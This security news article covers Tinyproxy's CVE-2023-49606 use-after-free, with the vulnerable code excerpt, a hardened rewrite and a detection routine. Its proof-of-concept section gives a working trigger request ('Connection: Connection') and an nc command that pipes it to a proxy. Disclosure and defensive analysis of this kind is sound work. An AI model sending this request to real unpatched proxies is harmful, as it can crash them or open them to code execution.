Tinyproxy Flaw Let Attackers Execute Remote Code

A security flaw has been identified in Tinyproxy, a lightweight HTTP/HTTPS proxy daemon widely used in small network environments.

The vulnerability, cataloged under CVE-2023-49606, allows remote attackers to execute arbitrary code on the host machine.

This flaw poses a critical risk as it could enable attackers to gain unauthorized access to network resources, potentially leading to further exploitation of internal systems.

Tinyproxy is designed to be a minimalistic proxy solution, which makes it popular in environments where system resources are limited and a full-featured proxy would be impractical.


Despite its benefits, this vulnerability shows that deploying Tinyproxy carries a serious risk, especially in security-sensitive environments.

CVE-2023-49606 – HTTP Connection Headers use-after-free vulnerability

The vulnerability stems from improper memory handling within Tinyproxy’s HTTP request parsing mechanism.

Attackers can exploit this flaw by sending specially crafted HTTP requests to the affected server.

This triggers a buffer overflow or a use-after-free error, leading to arbitrary code execution under the privileges of the Tinyproxy process.


The vulnerable code is in Tinyproxy's remove_connection_headers() function. The value of the Connection (or Proxy-Connection) header is looked up at (1), split into tokens, and each token is removed from the header map at (3). If a token names the Connection header itself, as in the request "Connection: Connection", that removal frees the very buffer that data and ptr point into, and both the remaining loop iterations and the final removal at (4) keep using the freed memory.

static int remove_connection_headers (orderedmap hashofheaders)
{
        static const char *headers[] = {
                "connection",
                "proxy-connection"
        };

        for (i = 0; i != (sizeof (headers) / sizeof (char *)); ++i) {
                /* Look for the connection header.  If it's not found, return. */
                data = orderedmap_find(hashofheaders, headers[i]);                (1)
                if (!data)
                        return 0;                                                 (2)
                ...
                ptr = data;
                while (ptr < data + len) {
                        orderedmap_remove (hashofheaders, ptr);                   (3)
                        ...
                }
                /* Now remove the connection header it self. */
                orderedmap_remove (hashofheaders, headers[i]);                    (4)
        }
        return 0;
}
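The following is an added example, not Tinyproxy's code or its patch: a small constructed header map with the same ownership rule as the excerpt above (removing an entry frees its value), and a hardened remove_connection_headers_safe() that copies the header value before tokenising it, so that removing a header named in its own Connection list can no longer free the buffer being walked. The map type, its function names and the sample header values are all assumptions made for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

/* Toy ordered header map, constructed for this example. It reproduces the one
 * property of the real orderedmap that matters here: removing an entry frees
 * its value, so a pointer obtained from find() before the removal dangles. */
#define MAX_HEADERS 16
struct hmap {
        char *key[MAX_HEADERS];
        char *val[MAX_HEADERS];
        int n;
};

static int hmap_add(struct hmap *m, const char *k, const char *v)
{
        if (m->n >= MAX_HEADERS)
                return -1;
        m->key[m->n] = strdup(k);
        m->val[m->n] = strdup(v);
        m->n++;
        return 0;
}

/* Case-insensitive lookup; returns the stored value or NULL. */
static char *hmap_find(const struct hmap *m, const char *k)
{
        for (int i = 0; i < m->n; i++)
                if (strcasecmp(m->key[i], k) == 0)
                        return m->val[i];
        return NULL;
}

/* Frees key and value and closes the gap; returns 1 if an entry was removed. */
static int hmap_remove(struct hmap *m, const char *k)
{
        for (int i = 0; i < m->n; i++) {
                if (strcasecmp(m->key[i], k) != 0)
                        continue;
                free(m->key[i]);
                free(m->val[i]);
                memmove(&m->key[i], &m->key[i + 1], (size_t)(m->n - i - 1) * sizeof(char *));
                memmove(&m->val[i], &m->val[i + 1], (size_t)(m->n - i - 1) * sizeof(char *));
                m->n--;
                return 1;
        }
        return 0;
}

static void hmap_clear(struct hmap *m)
{
        for (int i = 0; i < m->n; i++) {
                free(m->key[i]);
                free(m->val[i]);
        }
        m->n = 0;
}

/* Hardened hop-by-hop header removal (constructed; not Tinyproxy's fix).
 * The value is duplicated before it is tokenised, so the removals below may
 * free the map's own copy at any time without leaving data/ptr dangling. */
static int remove_connection_headers_safe(struct hmap *m)
{
        static const char *headers[] = { "connection", "proxy-connection" };

        for (size_t i = 0; i < sizeof headers / sizeof headers[0]; i++) {
                const char *found = hmap_find(m, headers[i]);
                if (!found)
                        continue;
                char *data = strdup(found);     /* private copy owned by us */
                if (!data)
                        return -1;
                size_t len = strlen(data);

                /* Split the token list in the private copy on separators. */
                for (char *p = data; (p = strpbrk(p, ", \t")) != NULL; )
                        *p++ = '\0';

                /* "Connection: Connection" now only frees the map's copy,
                 * never the buffer this loop is walking. */
                for (char *ptr = data; ptr < data + len; ptr += strlen(ptr) + 1)
                        if (*ptr)
                                hmap_remove(m, ptr);

                hmap_remove(m, headers[i]);     /* may already be gone; harmless */
                free(data);
        }
        return 0;
}

/* Constructed request header set used by the demo and tests. */
static void build_request(struct hmap *m, const char *conn_value)
{
        memset(m, 0, sizeof *m);
        hmap_add(m, "Host", "192.168.86.166:8000");
        hmap_add(m, "Connection", conn_value);
        hmap_add(m, "Keep-Alive", "timeout=5");
        hmap_add(m, "Upgrade", "h2c");
}

/* Number of headers that survive the hardened removal. */
static int headers_left(const char *conn_value)
{
        struct hmap m;
        build_request(&m, conn_value);
        remove_connection_headers_safe(&m);
        int n = m.n;
        hmap_clear(&m);
        return n;
}

/* 1 if `probe` is still present after the hardened removal, else 0. */
static int key_survives(const char *conn_value, const char *probe)
{
        struct hmap m;
        build_request(&m, conn_value);
        remove_connection_headers_safe(&m);
        int present = hmap_find(&m, probe) != NULL;
        hmap_clear(&m);
        return present;
}

int main(void)
{
        printf("Connection: Connection          -> %d headers left\n", headers_left("Connection"));
        printf("Connection: Keep-Alive, Upgrade -> %d headers left\n", headers_left("Keep-Alive, Upgrade"));
        return 0;
}
```

The design point is ownership: the excerpt tokenises and frees through the same pointer the map owns, so any token that names the header being processed turns a legitimate removal into a use-after-free. Taking a private copy makes the lifetime of the token buffer independent of what the map does, and the cost is one strdup per request.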

Exploit Proof of Concept

As mentioned, the PoC for the vulnerability is a very simple HTTP request. One variation is:

GET / HTTP/1.1
Connection: Connection
Host: 192.168.86.166:8000

Assuming there is an actual host at 192.168.86.166:8000, one can do:

cat heap-uaf.poc | nc 127.0.0.1 8888

With the relevant tinyproxy.config being:

Port 8888
Listen 127.0.0.1

The issue was first reported by the Cisco Talos Intelligence Group, which regularly scans popular open-source software for security vulnerabilities.

Following the discovery, patches and updates were swiftly released to mitigate the risk.

Users of Tinyproxy are urged to update to the latest version to protect against potential exploits.

Mitigation and Recommendations

For network administrators and users of Tinyproxy, it is crucial to apply the security patches provided by the developers immediately.

Additionally, monitoring network activity for any unusual behavior that might indicate an attempt to exploit this vulnerability is recommended.

Organizations should also consider implementing additional security measures such as intrusion detection systems (IDS) and regular security audits to protect their networks further.

Given the nature of this vulnerability, it is also advisable to restrict the network access to Tinyproxy servers, ensuring that only trusted devices can communicate with the proxy.
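As an added example of the monitoring recommended above (not code from the article or from Tinyproxy), the function below scans a raw HTTP request and reports whether its Connection or Proxy-Connection header lists one of those header names as a token, which is the request shape described in this article. It is the kind of check an IDS rule, a WAF plugin or a log-replay script would apply to traffic headed for an unpatched proxy. The sample requests are constructed for the example; the one marked as the PoC shape repeats the request shown earlier in the article.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Constructed sample requests (CRLF line endings, as on the wire). */
static const char REQ_BENIGN[] =
        "GET / HTTP/1.1\r\n"
        "Host: 192.168.86.166:8000\r\n"
        "Connection: keep-alive\r\n"
        "\r\n";

/* Same shape as the PoC request shown earlier in the article. */
static const char REQ_SELF_REF[] =
        "GET / HTTP/1.1\r\n"
        "Connection: Connection\r\n"
        "Host: 192.168.86.166:8000\r\n"
        "\r\n";

static const char *const HOP_HEADERS[] = { "connection", "proxy-connection" };

/* 1 if `len` bytes at `s` equal one of the hop-by-hop header names (case-insensitive). */
static int is_hop_name(const char *s, size_t len)
{
        for (size_t i = 0; i < 2; i++)
                if (strlen(HOP_HEADERS[i]) == len && strncasecmp(s, HOP_HEADERS[i], len) == 0)
                        return 1;
        return 0;
}

/* Returns 1 if a Connection/Proxy-Connection header names one of those headers
 * in its own token list, 0 otherwise (including on malformed input). */
static int self_referencing_connection_header(const char *raw)
{
        const char *line = strchr(raw, '\n');       /* skip the request line */
        if (!line)
                return 0;
        line++;

        while (*line) {
                const char *eol = strchr(line, '\n');
                size_t linelen = eol ? (size_t)(eol - line) : strlen(line);
                if (linelen && line[linelen - 1] == '\r')
                        linelen--;
                if (linelen == 0)
                        break;                      /* blank line: end of headers */

                const char *colon = memchr(line, ':', linelen);
                if (colon && is_hop_name(line, (size_t)(colon - line))) {
                        /* Walk the comma/space separated token list. */
                        const char *p = colon + 1, *end = line + linelen;
                        while (p < end) {
                                while (p < end && (*p == ' ' || *p == '\t' || *p == ','))
                                        p++;
                                const char *tok = p;
                                while (p < end && *p != ',' && *p != ' ' && *p != '\t')
                                        p++;
                                if (is_hop_name(tok, (size_t)(p - tok)))
                                        return 1;
                        }
                }
                if (!eol)
                        break;
                line = eol + 1;
        }
        return 0;
}

int main(void)
{
        printf("benign request   : %d\n", self_referencing_connection_header(REQ_BENIGN));
        printf("self-referencing : %d\n", self_referencing_connection_header(REQ_SELF_REF));
        return 0;
}
```

A match is a strong signal rather than proof of exploitation, since a self-referencing Connection header has no legitimate use; alerting on it, or dropping the request at a filtering layer in front of an unpatched proxy, is a reasonable interim control until the update is applied.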

While Tinyproxy offers significant advantages for small networks, this incident reminds us of the importance of maintaining up-to-date security practices, even in less resource-intensive applications.


Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
